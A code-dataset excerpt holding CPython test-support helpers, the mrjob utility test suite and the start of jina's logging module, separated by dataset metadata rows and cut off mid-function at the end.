msvcrt.CRTDBG_MODE_FILE)
old_file = msvcrt.CrtSetReportFile(report_type,
msvcrt.CRTDBG_FILE_STDERR)
self.old_modes[report_type] = old_mode, old_file
else:
if resource is not None:
try:
self.old_value = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE,
(0, self.old_value[1]))
except (ValueError, OSError):
pass
if sys.platform == 'darwin':
# Check if the 'Crash Reporter' on OSX was configured
# in 'Developer' mode and warn that it will get triggered
# when it is.
#
# This assumes that this context manager is used in tests
# that might trigger the next manager.
cmd = ['/usr/bin/defaults', 'read',
'com.apple.CrashReporter', 'DialogType']
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with proc:
stdout = proc.communicate()[0]
if stdout.strip() == b'developer':
print("this test triggers the Crash Reporter, "
"that is intentional", end='', flush=True)
return self
def __exit__(self, *ignore_exc):
"""Restore Windows ErrorMode or core file behavior to initial value."""
if self.old_value is None:
return
if sys.platform.startswith('win'):
self._k32.SetErrorMode(self.old_value)
if self.old_modes:
import msvcrt
for report_type, (old_mode, old_file) in self.old_modes.items():
msvcrt.CrtSetReportMode(report_type, old_mode)
msvcrt.CrtSetReportFile(report_type, old_file)
else:
if resource is not None:
try:
resource.setrlimit(resource.RLIMIT_CORE, self.old_value)
except (ValueError, OSError):
pass
def patch(test_instance, object_to_patch, attr_name, new_value):
"""Override 'object_to_patch'.'attr_name' with 'new_value'.
Also, add a cleanup procedure to 'test_instance' to restore
'object_to_patch' value for 'attr_name'.
The 'attr_name' should be a valid attribute for 'object_to_patch'.
"""
# check that 'attr_name' is a real attribute for 'object_to_patch'
# will raise AttributeError if it does not exist
getattr(object_to_patch, attr_name)
# keep a copy of the old value
attr_is_local = False
try:
old_value = object_to_patch.__dict__[attr_name]
except (AttributeError, KeyError):
old_value = getattr(object_to_patch, attr_name, None)
else:
attr_is_local = True
# restore the value when the test is done
def cleanup():
if attr_is_local:
setattr(object_to_patch, attr_name, old_value)
else:
delattr(object_to_patch, attr_name)
test_instance.addCleanup(cleanup)
# actually override the attribute
setattr(object_to_patch, attr_name, new_value)
def run_in_subinterp(code):
"""
Run code in a subinterpreter. Raise unittest.SkipTest if the tracemalloc
module is enabled.
"""
# Issue #10915, #15751: PyGILState_*() functions don't work with
# sub-interpreters, the tracemalloc module uses these functions internally
try:
import tracemalloc
except ImportError:
pass
else:
if tracemalloc.is_tracing():
raise unittest.SkipTest("run_in_subinterp() cannot be used "
"if tracemalloc module is tracing "
"memory allocations")
import _testcapi
return _testcapi.run_in_subinterp(code)
def check_free_after_iterating(test, iter, cls, args=()):
class A(cls):
def __del__(self):
nonlocal done
done = True
try:
next(it)
except StopIteration:
pass
done = False
it = iter(A(*args))
# Issue 26494: Shouldn't crash
test.assertRaises(StopIteration, next, it)
# The sequence should be deallocated just after the end of iterating
gc_collect()
test.assertTrue(done)
def missing_compiler_executable(cmd_names=[]):
"""Check if the compiler components used to build the interpreter exist.
Check for the existence of the compiler executables whose names are listed
in 'cmd_names' or all the compiler executables when 'cmd_names' is empty
and return the first missing executable or None when none is found
missing.
"""
from distutils import ccompiler, sysconfig, spawn
compiler = ccompiler.new_compiler()
sysconfig.customize_compiler(compiler)
for name in compiler.executables:
if cmd_names and name not in cmd_names:
continue
cmd = getattr(compiler, name)
if cmd_names:
assert cmd is not None, \
"the '%s' executable is not configured" % name
elif cmd is None:
continue
if spawn.find_executable(cmd[0]) is None:
return cmd[0]
_is_android_emulator = None
def setswitchinterval(interval):
# Setting a very low gil interval on the Android emulator causes python
# to hang (issue #26939).
minimum_interval = 1e-5
if is_android and interval < minimum_interval:
global _is_android_emulator
if _is_android_emulator is None:
_is_android_emulator = (subprocess.check_output(
['getprop', 'ro.kernel.qemu']).strip() == b'1')
if _is_android_emulator:
interval = minimum_interval
return sys.setswitchinterval(interval)
@contextlib.contextmanager
def disable_faulthandler():
# use sys.__stderr__ instead of sys.stderr, since regrtest replaces
# sys.stderr with a StringIO which has no file descriptor when a test
# is run with -W/--verbose3.
fd = sys.__stderr__.fileno()
is_enabled = faulthandler.is_enabled()
try:
faulthandler.disable()
yield
finally:
if is_enabled:
faulthandler.enable(file=fd, all_threads=True)
def fd_count():
"""Count the number of open file descriptors.
"""
if sys.platform.startswith(('linux', 'freebsd')):
try:
names = os.listdir("/proc/self/fd")
# Substract one because listdir() opens internally a file
# descriptor to list the content of the /proc/self/fd/ directory.
return len(names) - 1
except FileNotFoundError:
pass
MAXFD = 256
if hasattr(os, 'sysconf'):
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except OSError:
pass
old_modes = None
if sys.platform == 'win32':
# bpo-25306, bpo-31009: Call CrtSetReportMode() to not kill the process
# on invalid file descriptor if Python is compiled in debug mode
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
# no msvcrt or a release build
pass
else:
old_modes = {}
for report_type in (msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT):
old_modes[report_type] = msvcrt.CrtSetReportMode(report_type, 0)
try:
count = 0
for fd in range(MAXFD):
try:
# Prefer dup() over fstat(). fstat() can require input/output
# whereas dup() doesn't.
fd2 = os.dup(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
else:
os.close(fd2)
count += 1
finally:
if old_modes is not None:
for report_type in (msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT):
msvcrt.CrtSetReportMode(report_type, old_modes[report_type])
return count
class SaveSignals:
"""
Save and restore signal handlers.
This class is only able to save/restore signal handlers registered
by the Python signal module: see bpo-13285 for "external" signal
handlers.
"""
def __init__(self):
import signal
self.signal = signal
self.signals = signal.valid_signals()
# SIGKILL and SIGSTOP signals cannot be ignored nor caught
for signame in ('SIGKILL', 'SIGSTOP'):
try:
signum = getattr(signal, signame)
except AttributeError:
continue
self.signals.remove(signum)
self.handlers = {}
def save(self):
for signum in self.signals:
handler = self.signal.getsignal(signum)
if handler is None:
# getsignal() returns None if a signal handler was not
# registered by the Python signal module,
# and the handler is not SIG_DFL nor SIG_IGN.
#
# Ignore the signal: we cannot restore the handler.
continue
self.handlers[signum] = handler
def restore(self):
for signum, handler in self.handlers.items():
self.signal.signal(signum, handler)
def with_pymalloc():
import _testcapi
return _testcapi.WITH_PYMALLOC
class FakePath:
"""Simple implementing of the path protocol.
"""
def __init__(self, path):
self.path = path
def __repr__(self):
return f'<FakePath {self.path!r}>'
def __fspath__(self):
if (isinstance(self.path, BaseException) or
isinstance(self.path, type) and
issubclass(self.path, BaseException)):
raise self.path
else:
return self.path
def maybe_get_event_loop_policy():
"""Return the global event loop policy if one is set, else return None."""
return asyncio.events._event_loop_policy
|
[] |
[] |
[
"TZ"
] |
[]
|
["TZ"]
|
python
| 1 | 0 | |
tests/test_util.py
|
# Copyright 2009-2015 Yelp and Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests of all the amazing utilities in mrjob.util"""
import bz2
import gzip
import optparse
import os
import shutil
import sys
import tarfile
import tempfile
from io import BytesIO
from subprocess import PIPE
from subprocess import Popen
from mrjob.py2 import PY2
from mrjob.py2 import StringIO
from mrjob.util import buffer_iterator_to_line_iterator
from mrjob.util import cmd_line
from mrjob.util import file_ext
from mrjob.util import log_to_stream
from mrjob.util import parse_and_save_options
from mrjob.util import random_identifier
from mrjob.util import read_file
from mrjob.util import read_input
from mrjob.util import safeeval
from mrjob.util import scrape_options_into_new_groups
from mrjob.util import tar_and_gzip
from mrjob.util import to_lines
from mrjob.util import unarchive
from mrjob.util import unique
from mrjob.util import which
from tests.py2 import TestCase
from tests.py2 import patch
from tests.quiet import no_handlers_for_logger
from tests.sandbox import SandboxedTestCase
from tests.sandbox import random_seed
class ToLinesTestCase(TestCase):
def test_empty(self):
self.assertEqual(
list(to_lines(_ for _ in ())),
[])
def test_buffered_lines(self):
self.assertEqual(
list(to_lines(chunk for chunk in
[b'The quick\nbrown fox\nju',
b'mped over\nthe lazy\ndog',
b's.\n'])),
[b'The quick\n', b'brown fox\n', b'jumped over\n', b'the lazy\n',
b'dogs.\n'])
def test_empty_chunks(self):
self.assertEqual(
list(to_lines(chunk for chunk in
[b'',
b'The quick\nbrown fox\nju',
b'', b'', b'',
b'mped over\nthe lazy\ndog',
b'',
b's.\n',
b''])),
[b'The quick\n', b'brown fox\n', b'jumped over\n', b'the lazy\n',
b'dogs.\n'])
def test_no_trailing_newline(self):
self.assertEqual(
list(to_lines(chunk for chunk in
[b'Alouette,\ngentille',
b' Alouette.'])),
[b'Alouette,\n', b'gentille Alouette.'])
def test_long_lines(self):
super_long_line = b'a' * 10000 + b'\n' + b'b' * 1000 + b'\nlast\n'
self.assertEqual(
list(to_lines(
chunk for chunk in
(super_long_line[0+i:1024+i]
for i in range(0, len(super_long_line), 1024)))),
[b'a' * 10000 + b'\n', b'b' * 1000 + b'\n', b'last\n'])
def test_deprecated_alias(self):
with no_handlers_for_logger('mrjob.util'):
stderr = StringIO()
log_to_stream('mrjob.util', stderr)
self.assertEqual(
list(buffer_iterator_to_line_iterator(chunk for chunk in
[b'The quick\nbrown fox\nju',
b'mped over\nthe lazy\ndog',
b's.\n'])),
[b'The quick\n', b'brown fox\n', b'jumped over\n', b'the lazy\n',
b'dogs.\n'])
self.assertIn('has been renamed', stderr.getvalue())
class CmdLineTestCase(TestCase):
def test_cmd_line(self):
self.assertEqual(cmd_line(['cut', '-f', 2, '-d', ' ']),
"cut -f 2 -d ' '")
self.assertIn(cmd_line(['grep', '-e', "# DON'T USE$"]),
("grep -e \"# DON'T USE\\$\"",
'grep -e \'# DON\'"\'"\'T USE$\''))
# expand_path() is tested by tests.test_conf.CombineAndExpandPathsTestCase
class FileExtTestCase(TestCase):
def test_file_ext(self):
self.assertEqual(file_ext('foo.zip'), '.zip')
self.assertEqual(file_ext('foo.Z'), '.Z')
self.assertEqual(file_ext('foo.tar.gz'), '.tar.gz')
self.assertEqual(file_ext('README'), '')
self.assertEqual(file_ext('README,v'), '')
self.assertEqual(file_ext('README.txt,v'), '.txt,v')
class OptionScrapingTestCase(TestCase):
def setUp(self):
self.setup_options()
def setup_options(self):
self.original_parser = optparse.OptionParser(
usage="don't", description='go away')
self.original_group = optparse.OptionGroup(self.original_parser, '?')
self.original_parser.add_option_group(self.original_group)
self.original_parser.add_option(
'-b', '--no-a', dest='a', action='store_false')
self.original_parser.add_option(
'-a', '--yes-a', dest='a', action='store_true', default=False)
self.original_group.add_option('-x', '--xx', dest='x', action='store')
self.original_group.add_option('-y', '--yy', dest='y', action='store')
self.new_parser = optparse.OptionParser()
self.new_group_1 = optparse.OptionGroup(self.new_parser, '?')
self.new_group_2 = optparse.OptionGroup(self.new_parser, '?')
self.new_parser.add_option_group(self.new_group_1)
self.new_parser.add_option_group(self.new_group_2)
def test_scrape_all(self):
assignments = {
self.new_parser: ('a',),
self.new_group_1: ('x', 'y'),
}
old_groups = (self.original_parser, self.original_group)
scrape_options_into_new_groups(old_groups, assignments)
self.assertEqual(self.original_parser.option_list[1:],
self.new_parser.option_list[1:])
self.assertEqual(self.original_group.option_list,
self.new_group_1.option_list)
def test_scrape_different(self):
assignments = {
self.new_parser: ('x',),
self.new_group_1: ('y',),
self.new_group_2: ('a',),
}
old_groups = (self.original_parser, self.original_group)
scrape_options_into_new_groups(old_groups, assignments)
target_1 = self.original_group.option_list[:1]
target_2 = self.original_group.option_list[1:]
target_3 = self.original_parser.option_list[1:]
self.assertEqual(target_1, self.new_parser.option_list[1:])
self.assertEqual(target_2, self.new_group_1.option_list)
self.assertEqual(target_3, self.new_group_2.option_list)
options, args = self.new_parser.parse_args(['-x', 'happy'])
self.assertEqual(options.x, 'happy')
def test_parse_and_save_simple(self):
args = ['x.py', '-b', '-a', '--no-a', '-x', 'x', '-y', 'y', '-x', 'z']
self.assertEqual(
dict(parse_and_save_options(self.original_parser, args)),
{
'a': ['-b', '-a', '--no-a'],
'x': ['-x', 'x', '-x', 'z'],
'y': ['-y', 'y']
})
def test_parse_and_save_with_dashes(self):
args = ['x.py', '-b', '-a', '--no-a', '-x', 'x', '-y', 'y', '-x', 'z',
'--', 'ignore', 'these', 'args']
self.assertEqual(
dict(parse_and_save_options(self.original_parser, args)),
{
'a': ['-b', '-a', '--no-a'],
'x': ['-x', 'x', '-x', 'z'],
'y': ['-y', 'y']
})
class ReadInputTestCase(TestCase):
@classmethod
def setUpClass(cls):
cls.setup_tmpdir_with_beaver_data()
@classmethod
def tearDownClass(cls):
cls.delete_tmpdir()
# we're going to put the same data in every file, so we don't
# have to worry about ordering
BEAVER_DATA = b'Beavers mate for life.\n'
@classmethod
def setup_tmpdir_with_beaver_data(self):
self.tmpdir = tempfile.mkdtemp()
def write_beaver_data_and_close(f):
f.write(self.BEAVER_DATA)
f.close()
write_beaver_data_and_close(
open(os.path.join(self.tmpdir, 'beavers.txt'), 'wb'))
write_beaver_data_and_close(
gzip.GzipFile(os.path.join(self.tmpdir, 'beavers.gz'), 'wb'))
write_beaver_data_and_close(
bz2.BZ2File(os.path.join(self.tmpdir, 'beavers.bz2'), 'wb'))
os.mkdir(os.path.join(self.tmpdir, 'beavers'))
write_beaver_data_and_close(
open(os.path.join(self.tmpdir, 'beavers/README.txt'), 'wb'))
@classmethod
def delete_tmpdir(self):
shutil.rmtree(self.tmpdir)
def test_stdin(self):
lines = read_input('-', stdin=BytesIO(self.BEAVER_DATA))
self.assertEqual(list(lines), [self.BEAVER_DATA])
def test_stdin_can_be_iterator(self):
lines = read_input('-', stdin=[self.BEAVER_DATA] * 5)
self.assertEqual(list(lines), [self.BEAVER_DATA] * 5)
def test_normal_file(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers'))
self.assertEqual(list(lines), [self.BEAVER_DATA])
def test_gz_file(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers.gz'))
self.assertEqual(list(lines), [self.BEAVER_DATA])
def test_bz2_file(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers.bz2'))
self.assertEqual(list(lines), [self.BEAVER_DATA])
def test_glob(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers.*'))
self.assertEqual(list(lines), [self.BEAVER_DATA] * 3)
def test_dir(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers/'))
self.assertEqual(list(lines), [self.BEAVER_DATA])
def test_dir_recursion(self):
lines = read_input(self.tmpdir)
self.assertEqual(list(lines), [self.BEAVER_DATA] * 4)
def test_glob_including_dir(self):
lines = read_input(os.path.join(self.tmpdir, 'beavers*'))
self.assertEqual(list(lines), [self.BEAVER_DATA] * 4)
def test_bad_path(self):
# read_input is a generator, so we won't get an error
# until we try to read from it
self.assertRaises(IOError, list,
read_input(os.path.join(self.tmpdir, 'lions')))
def test_bad_glob(self):
# read_input is a generator, so we won't get an error
# until we try to read from it
self.assertRaises(IOError, list,
read_input(os.path.join(self.tmpdir, 'lions*')))
class SafeEvalTestCase(TestCase):
def test_simple_data_structures(self):
# try unrepr-ing a bunch of simple data structures
for x in True, None, 1, [0, 1, 2, 3, 4], {'foo': False, 'bar': 2}:
self.assertEqual(x, safeeval(repr(x)))
def test_no_mischief(self):
# make sure we can't do mischief
self.assertRaises(NameError, safeeval, "open('/tmp')")
def test_globals_and_locals(self):
# test passing in globals, locals
a = -0.2
self.assertEqual(
abs(a),
safeeval('abs(a)', globals={'abs': abs}, locals={'a': a}))
def test_range_type(self):
# ranges have different reprs on Python 2 vs. Python 3, and
# can't be checked for equality until Python 3.3+
if PY2:
range_type = xrange
else:
range_type = range
self.assertEqual(repr(safeeval(repr(range_type(3)))),
repr(range_type(3)))
if sys.version_info >= (3, 3):
self.assertEqual(safeeval(repr(range_type(3))),
range_type(3))
class ArchiveTestCase(TestCase):
def setUp(self):
self.setup_tmp_dir()
def tearDown(self):
self.rm_tmp_dir()
def setup_tmp_dir(self):
join = os.path.join
self.tmp_dir = tempfile.mkdtemp()
os.mkdir(join(self.tmp_dir, 'a')) # contains files to archive
# create a/foo
with open(join(self.tmp_dir, 'a', 'foo'), 'w') as foo:
foo.write('FOO\n')
# a/bar symlinks to a/foo
os.symlink('foo', join(self.tmp_dir, 'a', 'bar'))
# create a/baz; going to filter this out
with open(join(self.tmp_dir, 'a', 'baz'), 'w') as baz:
baz.write('BAZ\n')
# create a/qux/quux
os.mkdir(join(self.tmp_dir, 'a', 'qux'))
with open(join(self.tmp_dir, 'a', 'qux', 'quux'), 'w') as quux:
quux.write('QUUX\n')
def rm_tmp_dir(self):
shutil.rmtree(self.tmp_dir)
def ensure_expected_results(self, added_files=[], excluded_files=[]):
join = os.path.join
# make sure the files we expect are there
expected_files = ['bar', 'baz', 'foo', 'qux']
expected_files = (set(expected_files + added_files) -
set(excluded_files))
self.assertEqual(
sorted(os.listdir(join(self.tmp_dir, 'b'))),
sorted(expected_files))
self.assertEqual(
list(os.listdir(join(self.tmp_dir, 'b', 'qux'))), ['quux'])
# make sure their contents are intact
with open(join(self.tmp_dir, 'b', 'foo')) as foo:
self.assertEqual(foo.read(), 'FOO\n')
with open(join(self.tmp_dir, 'b', 'bar')) as bar:
self.assertEqual(bar.read(), 'FOO\n')
with open(join(self.tmp_dir, 'b', 'qux', 'quux')) as quux:
self.assertEqual(quux.read(), 'QUUX\n')
# make sure symlinks are converted to files
assert os.path.isfile(join(self.tmp_dir, 'b', 'bar'))
assert not os.path.islink(join(self.tmp_dir, 'b', 'bar'))
def test_tar_and_gzip(self):
join = os.path.join
# tar it up, and put it in subdirectory (b/)
tar_and_gzip(dir=join(self.tmp_dir, 'a'),
out_path=join(self.tmp_dir, 'a.tar.gz'),
filter=lambda path: not path.endswith('z'),
prefix='b')
# untar it into b/
t = tarfile.open(join(self.tmp_dir, 'a.tar.gz'), 'r:gz')
t.extractall(self.tmp_dir)
t.close()
self.ensure_expected_results(excluded_files=['baz'])
def archive_and_unarchive(self, extension, archive_template,
added_files=[]):
join = os.path.join
# archive it up
archive_name = 'a.' + extension
variables = dict(archive_name=join('..', archive_name),
files_to_archive='.')
archive_command = [arg % variables for arg in archive_template]
# sometime the relevant command isn't available or doesn't work;
# if so, skip the test
try:
proc = Popen(archive_command, cwd=join(self.tmp_dir, 'a'),
stdout=PIPE, stderr=PIPE)
except OSError as e:
if e.errno == 2:
self.skipTest("No %s command" % archive_command[0])
else:
raise
proc.communicate() # discard output
if proc.returncode != 0:
self.skipTest("Can't run `%s` to create archive." %
cmd_line(archive_command))
# unarchive it into b/
unarchive(join(self.tmp_dir, archive_name), join(self.tmp_dir, 'b'))
self.ensure_expected_results(added_files=added_files)
def test_unarchive_tar(self):
# this test requires that tar is present
self.archive_and_unarchive(
'tar',
['tar', 'chf', '%(archive_name)s', '%(files_to_archive)s'])
def test_unarchive_tar_gz(self):
# this test requires that tar is present and supports the "z" option
self.archive_and_unarchive(
'tar.gz',
['tar', 'czhf', '%(archive_name)s', '%(files_to_archive)s'])
def test_unarchive_tar_bz2(self):
# this test requires that tar is present and supports the "j" option
self.archive_and_unarchive(
'tar.bz2',
['tar', 'cjhf', '%(archive_name)s', '%(files_to_archive)s'])
def test_unarchive_jar(self):
# this test requires that jar is present
self.archive_and_unarchive(
'jar',
['jar', 'cf', '%(archive_name)s', '%(files_to_archive)s'],
added_files=['META-INF'])
def test_unarchive_zip(self):
# this test requires that zip is present
self.archive_and_unarchive('zip', ['zip', '-qr',
'%(archive_name)s', '%(files_to_archive)s'])
def test_unarchive_non_archive(self):
join = os.path.join
self.assertRaises(
IOError,
unarchive, join(self.tmp_dir, 'a', 'foo'), join(self.tmp_dir, 'b'))
class OnlyReadWrapper(object):
"""Restrict a file object to only the read() method (used by
ReadFileTestCase)."""
def __init__(self, fp):
self.fp = fp
def read(self, *args, **kwargs):
return self.fp.read(*args, **kwargs)
class ReadFileTestCase(TestCase):
def setUp(self):
self.make_tmp_dir()
def tearDown(self):
self.rm_tmp_dir()
def make_tmp_dir(self):
self.tmp_dir = tempfile.mkdtemp()
def rm_tmp_dir(self):
shutil.rmtree(self.tmp_dir)
def test_read_uncompressed_file(self):
input_path = os.path.join(self.tmp_dir, 'input')
with open(input_path, 'wb') as input_file:
input_file.write(b'bar\nfoo\n')
output = []
for line in read_file(input_path):
output.append(line)
self.assertEqual(output, [b'bar\n', b'foo\n'])
def test_read_uncompressed_file_from_fileobj(self):
input_path = os.path.join(self.tmp_dir, 'input')
with open(input_path, 'wb') as input_file:
input_file.write(b'bar\nfoo\n')
output = []
with open(input_path, 'rb') as f:
for line in read_file(input_path, fileobj=f):
output.append(line)
self.assertEqual(output, [b'bar\n', b'foo\n'])
def test_read_gz_file(self):
input_gz_path = os.path.join(self.tmp_dir, 'input.gz')
input_gz = gzip.GzipFile(input_gz_path, 'wb')
input_gz.write(b'foo\nbar\n')
input_gz.close()
output = []
for line in read_file(input_gz_path):
output.append(line)
self.assertEqual(output, [b'foo\n', b'bar\n'])
def test_read_bz2_file(self):
input_bz2_path = os.path.join(self.tmp_dir, 'input.bz2')
input_bz2 = bz2.BZ2File(input_bz2_path, 'wb')
input_bz2.write(b'bar\nbar\nfoo\n')
input_bz2.close()
output = []
for line in read_file(input_bz2_path):
output.append(line)
self.assertEqual(output, [b'bar\n', b'bar\n', b'foo\n'])
def test_read_large_bz2_file(self):
# catch incorrect use of bz2 library (Issue #814)
input_bz2_path = os.path.join(self.tmp_dir, 'input.bz2')
input_bz2 = bz2.BZ2File(input_bz2_path, 'wb')
# can't just repeat same value, because we need the file to be
# compressed! 50000 lines is too few to catch the bug.
with random_seed(0):
for _ in range(100000):
input_bz2.write((random_identifier() + '\n').encode('ascii'))
input_bz2.close()
# now expect to read back the same bytes
with random_seed(0):
num_lines = 0
for line in read_file(input_bz2_path):
self.assertEqual(line,
(random_identifier() + '\n').encode('ascii'))
num_lines += 1
self.assertEqual(num_lines, 100000)
def test_read_gz_file_from_fileobj(self):
input_gz_path = os.path.join(self.tmp_dir, 'input.gz')
input_gz = gzip.GzipFile(input_gz_path, 'wb')
input_gz.write(b'foo\nbar\n')
input_gz.close()
output = []
with open(input_gz_path, 'rb') as f:
for line in read_file(input_gz_path, fileobj=OnlyReadWrapper(f)):
output.append(line)
self.assertEqual(output, [b'foo\n', b'bar\n'])
def test_read_bz2_file_from_fileobj(self):
input_bz2_path = os.path.join(self.tmp_dir, 'input.bz2')
input_bz2 = bz2.BZ2File(input_bz2_path, 'wb')
input_bz2.write(b'bar\nbar\nfoo\n')
input_bz2.close()
output = []
with open(input_bz2_path, 'rb') as f:
for line in read_file(input_bz2_path, fileobj=OnlyReadWrapper(f)):
output.append(line)
self.assertEqual(output, [b'bar\n', b'bar\n', b'foo\n'])
class RandomIdentifierTestCase(TestCase):
def test_format(self):
with random_seed(0):
random_id = random_identifier()
self.assertEqual(len(random_id), 16)
self.assertFalse(set(random_id) - set('0123456789abcdef'))
def test_no_collisions_possible_ever(self):
# heh
with random_seed(0):
self.assertNotEqual(random_identifier(), random_identifier())
class UniqueTestCase(TestCase):
def test_empty(self):
self.assertEqual(list(unique([])), [])
def test_de_duplication(self):
self.assertEqual(list(unique([1, 2, 1, 5, 1])),
[1, 2, 5])
def test_preserves_order(self):
self.assertEqual(list(unique([6, 7, 2, 0, 7, 1])),
[6, 7, 2, 0, 1])
def test_mixed_types_ok(self):
self.assertEqual(list(unique(['a', None, 33, 'a'])),
['a', None, 33])
class WhichTestCase(SandboxedTestCase):
# which() is just a passthrough to shutil.which() and
# distutils.spawn.find_executable, so we're really just
# testing for consistent behavior across versions
def setUp(self):
super(WhichTestCase, self).setUp()
self.shekondar_path = self.makefile('shekondar', executable=True)
def test_explicit_path(self):
self.assertEqual(which('shekondar', path=self.tmp_dir),
self.shekondar_path)
def test_path_from_environment(self):
with patch.dict(os.environ, PATH=self.tmp_dir):
self.assertEqual(which('shekondar'), self.shekondar_path)
def test_not_found(self):
self.assertEqual(which('shekondar-the-fearsome', self.tmp_dir), None)
def test_no_path(self):
with patch.dict(os.environ, clear=True):
# make sure we protect find_executable() from missing $PATH
# on Python 2.
self.assertEqual(which('shekondar'), None)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
jina/logging/logger.py
|
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import logging
import logging.handlers
import os
import platform
import re
import sys
from typing import Optional
from pkg_resources import resource_filename
from . import formatter
from ..enums import LogVerbosity
from ..jaml import JAML
class NTLogger:
"""A compatible logger for Windows system, colors are all removed to keep compatible."""
def __init__(self, context: str, log_level: 'LogVerbosity' = LogVerbosity.INFO):
"""
Create a compatible logger for Windows system, colors are all removed to keep compatible.
:param context: The name prefix of each log.
:param log_level: Level of log.
"""
self.context = self._planify(context)
self.log_level = log_level
@staticmethod
def _planify(msg):
return re.sub(r'\u001b\[.*?[@-~]', '', msg)
def info(self, msg: str, **kwargs):
"""
Log info-level message.
:param msg: Context of log.
"""
if self.log_level <= LogVerbosity.INFO:
sys.stdout.write(f'{self.context}[I]:{self._planify(msg)}')
def critical(self, msg: str, **kwargs):
"""
Log critical-level message.
:param msg: Context of log.
"""
if self.log_level <= LogVerbosity.CRITICAL:
sys.stdout.write(f'{self.context}[C]:{self._planify(msg)}')
def debug(self, msg: str, **kwargs):
"""
Log debug-level message.
:param msg: Content of log.
"""
if self.log_level <= LogVerbosity.DEBUG:
sys.stdout.write(f'{self.context}[D]:{self._planify(msg)}')
def error(self, msg: str, **kwargs):
"""
Log error-level message.
:param msg: Context of log.
"""
if self.log_level <= LogVerbosity.ERROR:
sys.stdout.write(f'{self.context}[E]:{self._planify(msg)}')
def warning(self, msg: str, **kwargs):
"""
Log warning-level message.
:param msg: Context of log.
"""
if self.log_level <= LogVerbosity.WARNING:
sys.stdout.write(f'{self.context}[W]:{self._planify(msg)}')
def success(self, msg: str, **kwargs):
"""
Log success-level message.
:param msg: Context of log.
"""
if self.log_level <= LogVerbosity.SUCCESS:
sys.stdout.write(f'{self.context}[S]:{self._planify(msg)}')
class PrintLogger(NTLogger):
@staticmethod
def _planify(msg):
return msg
class SysLogHandlerWrapper(logging.handlers.SysLogHandler):
"""
Override the priority_map :class:`SysLogHandler`.
.. warning::
This messages at DEBUG and INFO are therefore not stored by ASL, (ASL = Apple System Log)
which in turn means they can't be printed by syslog after the fact. You can confirm it via :command:`syslog` or
:command:`tail -f /var/log/system.log`.
"""
priority_map = {
'DEBUG': 'debug',
'INFO': 'info',
'WARNING': 'warning',
'ERROR': 'error',
'CRITICAL': 'critical',
'SUCCESS': 'notice'
}
class JinaLogger:
supported = {'FileHandler', 'StreamHandler', 'SysLogHandler', 'FluentHandler'}
def __init__(self,
context: str,
name: Optional[str] = None,
log_config: Optional[str] = None,
identity: Optional[str] = None,
workspace_path: Optional[str] = None,
**kwargs):
"""
Build a logger for a context.
:param context: The context identifier of the class, module or method.
:param log_config: The configuration file for the logger.
:param identity: The id of the group the messages from this logger will belong, used by fluentd default
configuration to group logs by pod.
:param workspace_path: The workspace path where the log will be stored at (only apply to fluentd)
:returns: an executor object.
"""
from .. import __uptime__
if not log_config:
log_config = os.getenv('JINA_LOG_CONFIG',
resource_filename('jina', '/'.join(
('resources', 'logging.default.yml'))))
if not identity:
identity = os.getenv('JINA_LOG_ID', None)
if not name:
name = os.getenv('JINA_POD_NAME', context)
# Remove all handlers associated with the root logger object.
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
self.logger = logging.getLogger(context)
self.logger.propagate = False
if workspace_path is None:
workspace_path = os.getenv('JINA_LOG_WORKSPACE', '/tmp/jina/')
context_vars = {'name': name,
'uptime': __uptime__,
'context': context,
'workspace_path': workspace_path}
if identity:
context_vars['log_id'] = identity
self.add_handlers(log_config, **context_vars)
# note logger.success isn't default there
success_level = LogVerbosity.SUCCESS.value # between WARNING and INFO
logging.addLevelName(success_level, 'SUCCESS')
setattr(self.logger, 'success', lambda message: self.logger.log(success_level, message))
self.info = self.logger.info
self.critical = self.logger.critical
self.debug = self.logger.debug
self.error = self.logger.error
self.warning = self.logger.warning
self.success = self.logger.success
@property
def handlers(self):
"""
Get the handlers of the logger.
:returns: Handlers of logger.
"""
return self.logger.handlers
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def close(self):
"""
Close all the handlers.
:returns: None
"""
for handler in self.logger.handlers:
handler.close()
def add_handlers(self, config_path: str = None, **kwargs):
"""
Add handlers from config file.
:param config_path: Path of config file.
:param kwargs: Extra parameters.
:returns: None
"""
self.logger.handlers = []
with open(config_path) as fp:
config = JAML.load(fp)
for h in config['handlers']:
cfg = config['configs'].get(h, None)
fmt = getattr(formatter, cfg.get('formatter', 'PlainFormatter'))
if h not in self.supported or not cfg:
raise ValueError(f'can not find configs for {h}, maybe it is not supported')
handler = None
if h == 'StreamHandler':
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(fmt(cfg['format'].format_map(kwargs)))
elif h == 'SysLogHandler':
if cfg['host'] and cfg['port']:
handler = SysLogHandlerWrapper(address=(cfg['host'], cfg['port']))
else:
# a UNIX socket is used
if platform.system() == 'Darwin':
handler = SysLogHandlerWrapper(address='/var/run/syslog')
else:
handler = SysLogHandlerWrapper(address='/dev/log')
if handler:
handler.ident = cfg.get('ident', '')
handler.setFormatter(fmt(cfg['format'].format_map(kwargs)))
try:
handler._connect_unixsocket(handler.address)
except OSError:
handler = None
pass
